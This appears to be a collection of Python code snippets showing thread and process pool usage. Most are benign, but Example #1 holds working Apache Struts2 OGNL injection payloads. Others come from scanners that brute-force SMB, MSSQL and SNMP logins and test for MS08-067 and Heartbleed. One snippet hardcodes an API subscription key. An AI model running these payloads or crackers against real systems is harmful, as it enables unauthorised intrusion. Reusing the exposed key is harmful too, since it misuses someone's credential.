Example #1
0
def check_struct(url):
    global types
    global isvul
    isvul = False
    types = []
    payloads = []

    s2_16payload = r'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%22dir%3A%22%2B%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
    s2_19payload = r'debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()'
    s2_32payload = r'method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a'
    s2_33payload = r'/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_37payload = r'/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_devmode_payload = r'debug=browser&object=(%23mem=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=devMode dir--***'

    payloads.append(setPayload(s2_16payload, 's2_16payload'))
    payloads.append(setPayload(s2_19payload, 's2_19payload'))
    payloads.append(setPayload(s2_32payload, 's2_32payload'))
    payloads.append(setPayload(s2_33payload, 's2_33payload'))
    payloads.append(setPayload(s2_37payload, 's2_37payload'))
    payloads.append(setPayload(s2_devmode_payload, 's2_devmode_payload'))

    pool = Pool(6)

    for payload in payloads:
        pool.apply_async(func=url_request, args=(url, payload), callback=callback)
    pool.close()
    pool.join()

    if isvul:
        lock.acquire()
        fileSave(url, types)
        vulnerabilitys.append('[+]%s vulnerability exists %s!' % (url.strip(), ','.join(types)))
        lock.release()

    types = []
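# The helpers referenced above (setPayload, url_request, callback, fileSave) are
# not shown in this snippet. As an illustration only, a hypothetical callback that
# aggregates worker results into the globals used by check_struct could look like
# this (apply_async runs all callbacks in the pool's single result-handler thread,
# so no extra locking is needed inside it):
def callback(result):
    # assume url_request returns (vulnerable, payload_name)
    global isvul
    if result and result[0]:
        isvul = True
        types.append(result[1])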
Example #2
0
def main():
    n = 1000000
    m = 1
    m2 = 10000
    m3 = 100
    
    create_db()

    pool = Pool(processes=5)
    start = time.time()
    fill(n)
    fill_time = time.time() - start
    print('{} inserts in {}s'.format(n,fill_time))

    start = time.time()
    results = []
    for _ in range(m):
        results.append(pool.apply_async(read, ()))
#        results.append(pool.apply_async(read_dataset, ()))
        for i in range(m2):
            results.append(pool.apply_async(read_one, ()))
            if i%m3 == 0:
                results.append(pool.apply_async(fill, (1,)))
    for r in results:
        r.get(timeout=1000000)
    read_time = time.time() - start
    pool.terminate()

    print('{}.{} reads in {}s'.format(m,m2,read_time))
Example #3
0
    def execute(self):
        if pyqt:
            self.assignment.emit(['zones finalized', 0])

        self.aux_res.prepare(self.graph, self.results)
        self.matrix.matrix_view = self.matrix.matrix_view.reshape((self.graph.num_zones, self.graph.num_zones,
                                                                   self.results.classes['number']))
        mat = self.matrix.matrix_view
        pool = ThreadPool(self.results.cores)
        all_threads = {'count': 0}
        for orig in self.matrix.index:
            i = int(self.graph.nodes_to_indices[orig])
            if np.nansum(mat[i, :, :]) > 0:
                if self.graph.fs[i] == self.graph.fs[i+1]:
                    self.report.append("Centroid " + str(orig) + " is not connected")
                else:
                    pool.apply_async(self.func_assig_thread, args=(orig, all_threads))
                    # one_to_all(orig, self.matrix, self.graph, self.results, self.aux_res, 0)
        pool.close()
        pool.join()
        self.results.link_loads = np.sum(self.aux_res.temp_link_loads, axis=2)

        if pyqt:
            self.assignment.emit(['text AoN', "Saving Outputs"])
            self.assignment.emit(['finished_threaded_procedure', None])
Example #4
0
def apply(request, company_id):
	user = User.objects.get(email=request.user)
	company = Company.objects.filter(id=company_id)[0]
	if not user.profile or not user.profile.address:
		return HttpResponseRedirect('/profile/')
	if user.num_apps_left_today == 0:
		context = {}
		context['message'] = 'Sorry, you have exceeded max number of apps available per day. We are forced to have a cap because of limited server capabilities.'
		return render(request, 'thankyou.html', context)
	app = Application(user=user, company=company)
	app.save()
	user.num_apps_left_today -= 1
	user.save()
	pool = Pool(processes=1)
	def fill():
		url = random.choice(Client.objects.all()).ip + "fill"
		user_json = UserToJson(UserPlain(user))
		param = {'user':user_json, 'company_name':company.name, 'app_id':app.id}
		r = requests.get(url, params=param)
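	# NOTE: passing the nested fill() to apply_async only works if Pool is the
	# thread-backed multiprocessing.dummy.Pool; a process Pool cannot pickle a
	# nested function, and since the AsyncResult is never waited on, any such
	# failure would be silently dropped (fire-and-forget).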
	pool.apply_async(fill)
	context = {}
	context['message'] = 'Thanks for applying. Our automated system will be filling out your app in the next 10 mins. Check your email for confirmation.'
	if user.num_apps_left_today == daily_allowed_apps -1:
		context['company'] = company
	return render(request, 'thankyou.html', context)
Example #5
0
 def run_client_code(self, command):
     env = os.environ.copy()
     env["GOOEY"] = "1"
     print "run command:", command
     p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, env=env)
     self._process = p
     pool = Pool(1)
     pool.apply_async(self.read_stdout, (p, self.process_result))
Example #6
0
def query(id1, id2):
	#now = time.time()
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	#json1 = json.loads((urllib.urlopen(url)).read())['entities']
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	#json2 = json.loads((urllib.urlopen(url)).read())['entities']
	#print 'time use: ', time.time() - now
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	#json1 = (json.loads((urllib.urlopen(url)).read()))['entities']
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	#json2 = (json.loads((urllib.urlopen(url)).read()))['entities']

	url1 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	url2 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	poolResult = []
	pool = Pool(20)
	poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url1,)))
	poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url2,)))
	poolResult.append(pool.apply_async(getPaperJson, (id1, 'RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId')))
	poolResult.append(pool.apply_async(getPaperJson, (id2, 'F.FId,J.JId,C.CId,AA.AuId,AA.AfId,CC')))
	pool.close()
	#pool.join()
	json1 = poolResult[0].get()
	json2 = poolResult[1].get()
	paperJson1 = poolResult[2].get()
	paperJson2 = poolResult[3].get()
	# print len(json2)
	
	if json1 and json2:
		#afId1 = -1
		#afId2 = -1
		#for author in json1[0]['AA']:
		#	if author['AuId'] == id1 and author.has_key('AfId'):
		#		afId1 = author['AfId']
		#for author in json2[0]['AA']:
		#	if author['AuId'] == id2 and author.has_key('AfId'):
		#		afId2 = author['AfId']
		#return query_AuId_AuId(id1, id2, afId1, afId2)
		return query_AuId_AuId(id1, id2, json1, json2)
	elif json1:
		#afId1 = -1
		#for author in json1[0]['AA']:
		#	if author['AuId'] == id1 and author.has_key('AfId'):
		#		afId1 = author['AfId']
		#return query_AuId_Id(id1, id2, afId1)
		return query_AuId_Id(id1, id2, json1, paperJson2)
	elif json2:
		#afId2 = -1
		#for author in json2[0]['AA']:
		#	if author['AuId'] == id2 and author.has_key('AfId'):
		#		afId2 = author['AfId']
		#return query_Id_AuId(id1, id2, afId2)
		return query_Id_AuId(id1, id2, paperJson1, json2)
	else:
		if paperJson2.has_key('CC') and paperJson2['CC'] >= 50000:
			return query_Id_Id_big(id1, id2, paperJson1, paperJson2)
		else:
			return query_Id_Id_small(id1, id2, paperJson1, paperJson2)			
Example #7
0
def get_all_content(path):
    contents = set()
    pool = ThreadPool(100)
    max_page = get_max_page()
    for x in xrange(1, max_page + 1):
        pool.apply_async(get_content, args=(x, contents))
    pool.close()
    pool.join()
    store(path, contents)
Example #8
0
def run():
    print 'Parent process %s.' % os.getpid()
    p = Pool()
    for i in range(9):
        p.apply_async(long_time_task, args=(i,))
    print 'Waiting for all sub processes done...'
    p.close()
    p.join()
    print 'All sub processes done.'
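# long_time_task is not shown in this snippet; a minimal stand-in (hypothetical,
# the original may differ) that makes the example self-contained:
import os
import random
import time

def long_time_task(name):
    print('Run task %s (%s)...' % (name, os.getpid()))
    start = time.time()
    time.sleep(random.random() * 3)
    print('Task %s runs %0.2f seconds.' % (name, time.time() - start))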
Example #9
0
def get_blog(path):
    pool = ThreadPool(20)
    url = 'http://www.yinwang.org'
    contents = set()
    for blog_url in get_blog_url(url):
        pool.apply_async(get_content, args=(blog_url, contents))
    pool.close()
    pool.join()
    store(path, contents, 'docs_cn')
Example #10
0
def Async_log(user,url):
    if 'op.baihe.com' in url:
        mysql_op_log = Mysql.mysql_op(user, url)
        Proc = Pool()
        def Run():
            mysql_op_log.op_log()
        Proc.apply_async(Run)
        Proc.close()
        Proc.join()
Example #11
0
 def aliveRun(self, threads, domains):
     if type(domains) == type('a'):
         self.alivescan(domains)
     else:
         pool = Pool(threads)
         for domain in domains:
             pool.apply_async(func=self.alivescan, args=(domain,))
         pool.close()
         pool.join()
     print ''
     return self.results
Example #12
0
class AsyncDispatcher(object):
    """
    Runs blocking calls as asynchronous tasks
    """

    def __init__(self, num_threads=50):
        self.pool = ThreadPool(processes=num_threads)

    def run_as_asynch(self, task, on_success=None, on_error=None, on_complete=None):
        """
        Transforms a blocking call into an asynchronous task
        :param task: a function to run
        :param on_complete: a function to call when the task has finished running.
            Said function should accept the return value of the synchrouns task.
        :return:
        """

        def task_wrapper():
            """
            encapsulates tasks to catch their errors,
            as threadpool does not contain asynch error reporting by default
            """
            try:
                return task()
            except Exception as ex:
                logging.error(traceback.format_exc())
                # report asynchronous exception:
                if on_error:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_error, args=(ex,))
                # call the completion handler:
                if on_complete:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_complete)
                # re-raise the exception so it also propagates to the AsyncResult's get()
                raise Exception(ex)

        def success_wrapper(result):
            """
            called asynchronously when the task has finished running successfully
            """
            # This handler is called on the result thread,
            # so there is no need to reschedule the callback
            #
            # report success:
            if on_success:
                on_success(result)
            # report that task is completed
            if on_complete:
                on_complete()

        # run the task on a different thread:
        result = self.pool.apply_async(task_wrapper, callback=success_wrapper)
        return ScheduledTask(result)
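# A minimal usage sketch for the AsyncDispatcher above; fetch_report and the
# callbacks are hypothetical names, and ScheduledTask is assumed to be a thin
# wrapper around the AsyncResult returned by apply_async:
import logging

def fetch_report():
    # stand-in for a blocking call (network or disk I/O)
    return "report-data"

def report_ready(result):
    logging.info("task finished with %r", result)

def report_failed(exc):
    logging.error("task failed: %s", exc)

dispatcher = AsyncDispatcher(num_threads=4)
scheduled = dispatcher.run_as_asynch(fetch_report,
                                     on_success=report_ready,
                                     on_error=report_failed)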
Example #13
0
 def RunClientCode(self, command):
   def doInBackground(process, callback):
     while True:
       line = process.stdout.readline()
       if not line:
         break
       wx.CallAfter(self.core_gui.PublishConsoleMsg, line)
     wx.CallAfter(callback, process)
   p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
   _pool = Pool(1)
   _pool.apply_async(doInBackground, (p, self.HandleResult))
Example #14
0
    def upload_stream(self, stream_ref, **kwargs):
        if self.manifest["uploadId"] is None:
            raise RuntimeError('Cannot call upload before initializing an upload using new_upload.')

        # The pool of workers we have available, and the semaphore used to gate work into the pool (since just
        # submitting work to the pool doesn't block on the number of workers available to do it)
        pool = Pool(processes=self.parallel_process_count)
        semaphore = Semaphore(self.parallel_process_count)

        # A dict which will be shared between the threads in our pool (this would not work as-is with processes) but
        # we use threads via multiprocessing.dummy. If we use processes, then a Manager would likely be needed for this.
        #
        # should_continue will only ever be set to False by _upload_stream_part so not too worried if we have multiple
        # writers
        #
        # Queue should be thread safe (though for tracking the exceptions, order doesn't strictly matter)
        shared_dict = {'should_continue': True, 'exceptions': Queue()}

        part_counter = 0

        apply_async_kwargs = kwargs.copy()
        apply_async_kwargs['semaphore'] = semaphore
        apply_async_kwargs['shared_dict'] = shared_dict

        # We pull data from the stream until there is no more
        keep_reading = True
        while keep_reading:
            if six.PY3:
                read_bytes = stream_ref.buffer.read(self.part_size)
            else:
                read_bytes = stream_ref.read(self.part_size)

            semaphore.acquire()

            if len(read_bytes) != 0:
                pool.apply_async(self._upload_stream_part, (part_counter, read_bytes), apply_async_kwargs)
                part_counter += 1

            keep_reading = (len(read_bytes) == self.part_size) and shared_dict['should_continue']

        # If we're here we've either sent off all the work we needed to (and so are waiting on remaining bits to finish)
        # or we terminated early because of an exception in one of our uploads. In either case, close off the pool to
        # any more work and let the remaining work finish gracefully
        pool.close()
        pool.join()

        # If we had at least one exception then throw out an error to indicate failure
        if not shared_dict['exceptions'].empty():
            raise MultipartUploadError(error_causes_queue=shared_dict['exceptions'])

        # Because we processed in parallel, the parts in the manifest may be out of order. Re-order them based on the part number
        # because commit assumes that they are ordered
        self.manifest['parts'].sort(key=lambda part: part['part_num'])
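# The gating trick above (acquire a semaphore before apply_async, release it in
# the worker) keeps at most parallel_process_count parts buffered at a time. A
# stripped-down sketch of the same idea with hypothetical names; the real
# _upload_stream_part is assumed to release the semaphore itself:
import io
from multiprocessing.dummy import Pool as ThreadPool
from threading import Semaphore

stream = io.BytesIO(b'x' * (3 * 1024 * 1024))  # stand-in for the real input stream
part_size = 1024 * 1024

def upload_part(part_num, data, semaphore):
    try:
        # ... send `data` to the object store here ...
        return part_num, len(data)
    finally:
        semaphore.release()        # free a slot so the reader can queue more work

pool = ThreadPool(processes=4)
semaphore = Semaphore(4)
results, part_num = [], 0
while True:
    chunk = stream.read(part_size)
    if not chunk:
        break
    semaphore.acquire()            # block until a worker slot is free
    results.append(pool.apply_async(upload_part, (part_num, chunk, semaphore)))
    part_num += 1
pool.close()
pool.join()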
Example #15
0
 def check_main(self, xml_file, server):
     # Check whether a file has been selected
     if self.filename == '':
         self.lb.config(text="请先选择 index.xml 文件")
     else:
         self.lfc_field_1_t.insert(END, 'Start [%s]\n' % xml_file, 'blue')
         self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
         self.lfc_field_1_t.update()
         component_num = set()
         url_num = 0
         # Check whether the ini config file exists
         if os.path.isfile(server):
             tree = ET.ElementTree(file=xml_file)
             iau_url = ''
             # Use a thread pool; otherwise the packaged exe tends to fail because of the heavy IO
             async_pool = ThreadPool(100)
             for product in tree.findall('products'):
                 pid = 'c' + product.attrib['class'] + 't' + product.attrib['type'] + 'v' + product.attrib['ver'] + 'l' + product.attrib['lang'] + 'p' + product.attrib['plat'] + 'r' + product.attrib['region'] + 'o' + product.attrib['oem']
                 p = re.compile(r'%s$' % pid)
                 with open(server, 'r') as f:
                     for line in f.readlines():
                         if re.search(p, line.strip()):
                             iau_url = line.strip()
                             url_num += 1
                             break
                 if iau_url == '':
                     self.lfc_field_1_t.insert(END, '%s 对应的 URL 在 ini 配置文件中未找到,请检查配置!\n' % pid, 'red')
                     self.lfc_field_1_t.update()
                 else:
                     component_list = set()
                     # .//entity searches for all entity elements under the current products node
                     for entity in product.findall('.//entity'):
                         component = entity.attrib['name']
                         component_num.add(component)
                         component_list.add(component)
                     async_pool.apply_async(self.iau_check, (component_list, iau_url))
             async_pool.close()
             async_pool.join()
         else:
             self.lfc_field_1_t.insert(END, '未找到 %s 配置文件,请确保该配置文件存放在 exe 同目录下!\n' % server, 'red')
             self.lfc_field_1_t.update()
         self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
         self.lfc_field_1_t.insert(END, 'End [%s]\n' % xml_file, 'blue')
         self.lfc_field_1_t.insert(END, '---- 本次 AU 涉及 % s 个 component,%s 个 product \n' % (len(component_num), url_num), 'blue')
         self.lfc_field_1_t.insert(END, '---- Pass: % s 个 \n' % self.pass_num, 'blue')
         self.lfc_field_1_t.insert(END, '---- Fail: % s 个 \n\n' % self.fail_num, 'blue')
         self.pass_num = 0
         self.fail_num = 0
         self.lfc_field_1_t.update()
         self.lfc_field_1_t.see(END)
Example #16
0
class EventManager:
    """
    事件分发
    """
    def __init__(self):
        """
        初始化
        """
        self.__event_handler = {}
        self.__pool = Pool(5)

    def add_event_handler(self, event_type, handler):
        """
        注册 event handler
        :param event_type: 事件类型
        :type event_type: object
        :param handler: Event Handler
        :type handler: function
        """
        self.__event_handler.setdefault(event_type, []).append(handler)

    def dispatch_event(self, event):
        """
        分发事件
        :param event: 事件
        :type event: Event
        :return: 是否分发成功
        :rtype: bool
        """
        try:
            handlers = self.__event_handler.get(event.__class__, [])
            for handler in handlers:
                self.__pool.apply_async(
                    func=handler,
                    args=(event,),
                    callback=self.__handler_callback
                )
            return True
        except:
            traceback.print_exc()
            return False

    def __handler_callback(self, result):
        """
        进程回调
        :param result: 返回值
        :type result: str
        """
        print time.ctime(), (result)
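# A minimal usage sketch for the EventManager above; OrderFilled and
# on_order_filled are hypothetical names. If the Pool is process-based, both the
# handler and the event must be picklable (defined at module level), which is
# why no lambdas are used here:
class OrderFilled(object):
    def __init__(self, order_id):
        self.order_id = order_id

def on_order_filled(event):
    return 'handled order %s' % event.order_id

manager = EventManager()
manager.add_event_handler(OrderFilled, on_order_filled)
manager.dispatch_event(OrderFilled(42))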
Example #17
0
def download_all(vals, get_response_loc_pair, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        pool = ThreadPool(thread_num)
        for val in vals:
            pool.apply_async(download, args=(val, get_response_loc_pair),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in vals:
            response_loc_pair = get_response_loc_pair(val)
            log_result(download(response_loc_pair))
Example #18
0
def fill(request):
	json = request.GET['user']
	user = JsonToUser(json)
	user.getResume()
	company_name = request.GET['company_name']
	form = form_dict[company_name]
	form_fill(user, form)
	user.deleteResume()
	pool = Pool(processes=1)
	def fill():
		url = Server.objects.all()[0].ip + "confirm_app"
		param = {'app_id':request.GET['app_id'], 'status':"success"}
		r = requests.get(url, params=param)
	pool.apply_async(fill)
	return HttpResponse("lol")
Example #19
0
    def run(self,ipdict,pinglist,threads,file):
        printPink("crack snmp now...")
        print "[*] start crack snmp %s" % time.ctime()
        starttime=time.time()
        pool=Pool(threads)
        for ip in pinglist:
            pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))

        pool.close()
        pool.join()

        print "[*] stop crack snmp %s" % time.ctime()
        print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
        
        for i in xrange(len(self.result)):
            self.config.write_file(contents=self.result[i],file=file) 
Example #20
0
    def run(self,ipdict,pinglist,threads,file):
        if len(ipdict['mssql']):
            printPink("crack sql service now...")
            print "[*] start crack sql service %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['mssql']:
                pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()

            print "[*] stop crack sql serice  %s" % time.ctime()
            print "[*] crack sql serice  done,it has Elapsed time:%s " % (time.time()-starttime)

            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file) 
Example #21
0
def download_all_http(vals, get_response_loc_pair, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        log.info("starting threaded download")
        pool = ThreadPool(thread_num)
        for val in vals:
            log.debug("async start for {}".format(str(val)))
            pool.apply_async(download_http, args=(val, get_response_loc_pair),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in vals:
            log_result(download_http(val, get_response_loc_pair))
Example #22
0
def multithread(function, items, extra_variable, threads=2):
    """ Takes the main function to run in parallel, inputs the variable(s) and returns the results.
    :param function: The main function to process in parallel.
    :param items: A list of strings that are passed into the function for each thread.
    :param extra_variable: One additional variable that can be passed into the function.
    :param threads: The number of threads to use. The default is 2, but the threads are not CPU core bound.
    :return: The results of the function passed into this function.
    """

    if __name__ == '__main__':

        # """ A CPU core dependent multiprocessing technique.
        # The synchronized variant, which locks the main program until a process is finished. Order is retained. """
        # pool = Pool(threads)
        # results = [pool.apply(function, args=(item, extra_variable)) for item in items]
        # pool.close()
        # pool.join()

        # """ A thread dependent multiprocessing technique. Theoretically, an unlimited number of threads can be used.
        # The synchronized variant, which locks the main program until a process is finished. Order is retained. """
        # pool = ThreadPool(threads)
        # results = [pool.apply(function, args=(item, extra_variable)) for item in items]
        # pool.close()
        # pool.join()

        """ A thread dependent multiprocessing technique. Theoretically, an unlimited number of threads can be used.
        The async variant, which submits all processes at once and retrieve the results as soon as finished. """
        pool = ThreadPool(threads)
        output = [pool.apply_async(function, args=(item, extra_variable)) for item in items]
        results = [p.get() for p in output]

        return results
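# A short, hypothetical call of the multithread() helper above: fetch_status is
# a stand-in worker, and 5 is the shared extra_variable (a timeout in seconds):
import requests

def fetch_status(url, timeout):
    return url, requests.get(url, timeout=timeout).status_code

if __name__ == '__main__':
    urls = ['https://example.com/a', 'https://example.com/b']
    print(multithread(fetch_status, urls, 5, threads=4))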
Example #23
0
def main():
	print "create initial dataset directory: [./dataset]"

	directory = "dataset"

	if not os.path.exists(directory):
		os.makedirs(directory)

	pages = []

	pages = api.get_pages()
	# pages = pages[0:50]

	pool = ThreadPool(8)

	l = len(pages)
	i = 0

	for p in pages:
		x = pool.apply_async(get_page_info, args=(p["url"], l, i, ))
		# x.get()
		i = i + 1

	pool.close()
	pool.join()
Example #24
0
def abortable_func(func, *args, **kwargs):
	"""
	The abortable_func is the wrapper function, which wraps around function type "func", call 
	  it in a background thread (multiprocessing.dummy.Thread), and terminates it after
	  "timeout" seconds.
	This function is inspired by 
	  http://stackoverflow.com/questions/29494001/how-can-i-abort-a-task-in-a-multiprocessing-pool-after-a-timeout
	  but is an improvement over the original solution, since the original solution is only 
	  applicable to a function that takes positional arguments.

	Parameters of the function:
	  func - the function that will be called, and terminated if it does not return within "timeout" seconds
	  *args - positional arguments of "func"
	  **kwargs - named arguments of "func" + "timeout" value
	"""
	
	#- Get "timeout" value and create a ThreadPool (multiprocessing.dummy.Pool) 
	#  with only 1 worker. 
	#- Use functools.partial (https://docs.python.org/3/library/functools.html)
	#  to fit all the arguments of the func into the interface of
	#  Pool.apply_async function
	timeout = kwargs.pop('timeout', None);
	p = ThreadPool(1);
	partial_func = partial(func,**kwargs);
	res = p.apply_async(partial_func,args);

	#- Terminate the thread if it does not return after "timeout" seconds
	#  otherwise return the returned value of func
	try:
		out = res.get(timeout);
		return out
	except TimeoutError:
		p.terminate()
		return "{}:Timeout exceeded. Process terminated.\r\n".format(args[0]);
Example #25
0
class DomainScanner(object):
	"""
	Subdomain name scanner that provides both exhaustive brute force and
	dictionary-based brute force functions.
	"""
	def __init__(self,thread_num,timeout):
		super(DomainScanner, self).__init__()
		self._pool=Pool(thread_num)
		self._timeout=timeout
	
	def complete_brute(self,target,charset,begin_str,end_str):
		result=''
		resultl=[]
		bflist=generate_bflist(charset,begin_str,end_str)
		for cur in bflist:
			cur_target=cur+'.'+target
			resultl.append(self._pool.apply_async(self._scan_target,args=(cur_target,)))
		# get result from list
		for cur in resultl:
			try:
				result+=cur.get(timeout=self._timeout)
			except TimeoutError, e:
				continue
		# deal with result
		if result=='':
			result='no subdomain'
		else:
			result=result[:-1]
		return result
Example #26
0
def download_all_ftp(url, download_fct, download_args, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        log.info("starting threaded download")
        pool = ThreadPool(thread_num)
        for val in download_args:
            log.debug("async start for {}".format(str(val)))
            pool.apply_async(download_fct, args=(val,),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in download_args:
            log_result(download_fct(val))
Example #27
0
    def run(self,ipdict,pinglist,threads,file):
        if len(ipdict['http']):
            print "[*] start test web burp at %s" % time.ctime()
            starttime=time.time()

            pool=Pool(threads)

            for ip in ipdict['http']:
                pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()

            print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime()
            print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime)

            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)  
Example #28
0
def smb_main(ipdict,threads):
    printPink("crack smb  now...")
    print "[*] start crack smb serice  %s" % time.ctime()
    starttime=time.time()

    global lock
    lock = threading.Lock()
    global result
    result=[]

    pool=Pool(threads)

    for ip in ipdict['smb']:
        pool.apply_async(func=smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()



    print "[*] stop smb serice  %s" % time.ctime()
    print "[*] crack smb  done,it has Elapsed time:%s " % (time.time()-starttime)



#------------------------------------------------------------------
#------------------------割----------------------------------------
#------------------------------------------------------------------

# test ms08_067
    printPink("test ms_08_067  now...")
    print "[*] test ms_08_067  at  %s" % time.ctime()
    starttime=time.time()

    pool=Pool(threads)

    for ip in ipdict['smb']:
        pool.apply_async(func=check,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()


    print "[*] done test ms_08_067  now :%s " % (time.time()-starttime)
    return result
Example #29
0
def openssl_main(ipdict, threads):
    printPink("crack ssl  now...")
    print "[*] start test openssl_heart  %s" % time.ctime()
    starttime = time.time()

    global lock
    lock = threading.Lock()
    global result
    result = []
    pool = Pool(threads)
    for ip in ipdict["http"]:
        pool.apply_async(func=openssl_test, args=(str(ip).split(":")[0], int(str(ip).split(":")[1])))
    pool.close()
    pool.join()

    print "[*] stop ssl serice  %s" % time.ctime()
    print "[*] crack ssl done,it has Elapsed time:%s " % (time.time() - starttime)
    return result
Example #30
0
def mssql_main(ipdict,threads):
    printPink("crack sql serice  now...")
    print "[*] start crack sql serice  %s" % time.ctime()
    starttime=time.time()
    pool=Pool(threads)
    global lock
    lock = threading.Lock()
    global result
    result=[]

    for ip in ipdict['mssql']:
        pool.apply_async(func=mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()

    print "[*] stop crack sql serice  %s" % time.ctime()
    print "[*] crack sql serice  done,it has Elapsed time:%s " % (time.time()-starttime)
    return result
Example #31
0
urls = moz_top_500_urls.split()
"""
for url in urls:
    print("[+] requesting [http://www." + url + "]......")
    try:
        requests.get("http://"+url, timeout=0.1)
    except KeyboardInterrupt:
        sys.exit(1)
    except Exception as e:
        #print(str(e))
        sys.exit()
        pass
"""
pool = Pool(500)
futures = []
